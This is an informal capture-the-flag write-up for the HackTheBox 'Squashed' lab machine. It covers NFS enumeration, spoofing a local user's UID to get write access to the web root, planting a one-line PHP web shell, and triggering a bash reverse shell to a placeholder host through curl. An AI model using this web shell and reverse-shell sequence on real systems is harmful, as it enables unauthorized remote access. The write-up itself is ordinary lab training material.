SITE = HTB
Diff = Easy
##SCAN
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48add5b83a9fbcbef7e8201ef6bfdeae (RSA)
| 256 b7896c0b20ed49b2c1867c2992741c1f (ECDSA)
|_ 256 18cd9d08a621a8b8b6f79f8d405154fb (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Built Better
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3 2049/udp nfs
| 100003 3 2049/udp6 nfs
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100005 1,2,3 35822/udp6 mountd
| 100005 1,2,3 42139/udp mountd
| 100005 1,2,3 42885/tcp6 mountd
| 100005 1,2,3 59329/tcp mountd
| 100021 1,3,4 42171/tcp6 nlockmgr
| 100021 1,3,4 44021/tcp nlockmgr
| 100021 1,3,4 44753/udp6 nlockmgr
| 100021 1,3,4 46326/udp nlockmgr
| 100227 3 2049/tcp nfs_acl
| 100227 3 2049/tcp6 nfs_acl
| 100227 3 2049/udp nfs_acl
|_ 100227 3 2049/udp6 nfs_acl
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel##PORT 111
This port is mostly used for nfs.
We can mount directories from the port to our machine
$ showmount -e 10.10.11.191
Export list for 10.10.11.191:
/home/ross *
/var/www/html *There are two directories there nothing in ross’ directory expect a keepass database that we cant crack easily.Movin on!
$ sudo mount -t nfs 10.10.11.191:/var/www/html /mnt
mount.nfs: access denied by server while mounting 10.10.11.191:/var/www/html
$ ls -ld /mnt
drwxr-xr-- 5 **2017** www-data 4096 Mar 7 17:20 /mnt/So I created a new user for this task and gave it perm 2017
$ sudo useradd lol && sudo passwd lol && sudo usermod -u 2017 lolNow we can access it BooM
drwxr-xr-- 5 lol http 4096 Mar 7 10:20 .
drwxr-xr-x 17 root root 4096 Feb 15 21:24 ..
drwxr-xr-x 2 lol http 4096 Mar 7 10:20 css
-rw-r--r-- 1 lol http 44 Oct 21 15:30 .htaccess
drwxr-xr-x 2 lol http 4096 Mar 7 10:20 images
-rw-r----- 1 lol http 32532 Mar 7 10:20 index.html
drwxr-xr-x 2 lol http 4096 Mar 7 10:20 jsWe can WRITE in this directory
$ echo '<?php system($_REQUEST["cmd"]); ?>' > shell.php
$ curl 'http://10.10.11.191/shell.php' --data-urlencode 'cmd=bash -c "bash -i >& /dev/tcp/<IP>/<PORT> 0>&1"'##ALEX
alex@squashed:/home/alex$ s -al
hls -al
total 4700
drwxr-xr-x 19 alex alex 4096 Mar 7 04:59 .
drwxr-xr-x 4 root root 4096 Oct 21 14:57 ..
-rw-r--r-- 1 alex alex 57 Mar 5 23:30 .Xauthority
-rw-r--r-- 1 alex alex 57 Mar 5 23:30 .Xauthority.1
lrwxrwxrwx 1 root root 9 Oct 17 13:23 .bash_history -> /dev/null
drwxr-xr-x 8 alex alex 4096 Oct 21 14:57 .cache
drwx------ 8 alex alex 4096 Oct 21 14:57 .config
drwx------ 3 alex alex 4096 Mar 6 01:27 .gnupg
drwx------ 3 alex alex 4096 Oct 21 14:57 .local
drwxrwxrwx 2 alex alex 4096 Mar 6 01:48 .pkexec
drwx------ 2 alex alex 4096 Mar 7 04:59 .ssh
lrwxrwxrwx 1 root root 9 Oct 21 13:06 .viminfo -> /dev/null
-rw-rw-rw- 1 alex alex 34180 Mar 6 01:53 CVE-2022-2586.c
drwxr-xr-x 2 alex alex 4096 Oct 21 14:57 Desktop
drwxr-xr-x 2 alex alex 4096 Oct 21 14:57 Documents
drwxr-xr-x 2 alex alex 4096 Oct 21 14:57 Downloads
drwxrwxrwx 2 alex alex 4096 Mar 6 01:48 GCONV_PATH=.
drwxr-xr-x 2 alex alex 4096 Oct 21 14:57 Music
drwxr-xr-x 2 alex alex 4096 Oct 21 14:57 Pictures
drwxr-xr-x 2 alex alex 4096 Oct 21 14:57 Public
drwxrwxrwx 4 alex alex 4096 Mar 6 02:08 PwnKit
drwxr-xr-x 2 alex alex 4096 Oct 21 14:57 Templates
drwxr-xr-x 2 alex alex 4096 Oct 21 14:57 Videos
-rw-rw-rw- 1 alex alex 2299 Mar 6 02:02 index.html
-rwxrwxrwx 1 alex alex 828078 Jan 1 04:26 linpeas.sh
-rw-r--r-- 1 alex alex 1923179 Mar 7 04:47 sc.xwd
-rw-r--r-- 1 alex alex 1923179 Mar 6 10:37 screenshot.xwd
drwx------ 3 alex alex 4096 Oct 21 14:57 snap
-rw-r----- 1 root alex 33 Mar 5 23:31 user.txtI moved the screenshot file to the webserver and downloaded it
alex@squashed:/home/alex$ su
su
Password: <BOOOOOOOO!!!!!!>THANKS for reading
Take Care Happy Hacking!! 👏
